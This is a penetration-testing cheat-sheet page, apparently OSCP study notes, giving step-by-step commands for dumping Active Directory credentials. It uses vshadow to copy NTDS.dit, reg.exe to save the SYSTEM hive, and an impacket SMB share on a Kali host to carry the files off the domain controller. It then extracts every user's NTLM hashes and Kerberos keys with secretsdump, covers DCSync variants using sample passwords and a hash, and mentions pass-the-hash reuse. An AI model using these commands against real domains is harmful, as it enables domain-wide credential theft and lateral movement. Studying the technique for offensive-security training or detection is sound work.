Shadow Copies

To manage volume shadow copies, the Microsoft signed binary vshadow.exe is offered as part of the Windows SDK.

As domain admins, the vshadow utility can be abused to create a Shadow Copy that will allow the extraction of the Active Directory Database NTDS.dit database file.

Step 1: Administrative Access Setup

Step 2: Shadow Copy Creation and NTDS Database Backup

Download the vshadow tool and run it to make a copy of ntds.dit file

# Login into DC1 with admin user.
# Start elavated CMD.
# and make the back of vshadow.(This binary is in C:\Tools)
# Use CMD
vshadow.exe -nw -p  C:

Copy the whole AD Database from the shadow copy to the C: drive root folder by specifying the shadow copy device name and adding the full ntds.dit path.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Step 3: Registry Hive Backup

As a last ingredient, to correctly extract the content of ntds.dit, we need to save the SYSTEM hive from the Windows registry. Which can be done like below:

reg.exe save hklm\system c:\system.bak

Step 4: File Transfer to Kali Linux

Transfer both files to Kali Linux.

# Move both files using SMB server.
# In Kali Linux run smb server.
impacket-smbserver -smb2support -username user -password user123 drive .

# In the victim machine run the below commands:
net use Z: \\192.168.45.164\drive /u:user user123
copy ntds.dit.bak Z:
copy  system.bak Z:

Step 5: Credential Extraction

Extract NTLM hashes and Kerberos keys from the files using the Impacket secretsdump tool.

# Extract the credential materials with the secretsdump tool from the impacket suite, supplying the ntds database with the -ntds parameter and the system hive with the -system parameter, and adding the LOCAL keyword to parse the files locally
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Great! We managed to obtain NTLM hashes and Kerberos keys for every AD user. We can now try to crack them or use them as-is in pass-the-hash attacks.

[Easy-Way] Another way is using Secretsdump directly

Fetch all user hashes

# Dumping all users' hashes at once from NTDS.DIT
# Condition for DCsync attack applies here.
impacket-secretsdump -just-dc medtech.com/leon:"rabbit:)"@$dc01

# can also use -just-dc-ntlm flag for ntlm only for all users

# We can also use hash for authentication.
impacket-secretsdump -just-dc beyond.com/[email protected] -hashes :8480fa6ca85394df498139fe5ca02b95

You can check more from the DCSync attack module.

Only Need NTLM Hashes !!!

we can use -just-dc-ntlm a flag for that


impacket-secretsdump -just-dc-ntlm corp.com/jeffadmin:'BrouhahaTungPerorateBroom2023!'@192.168.214.70

PreviousGolden Ticket NextOther CheatSheet for OSCP

Last updated 1 year ago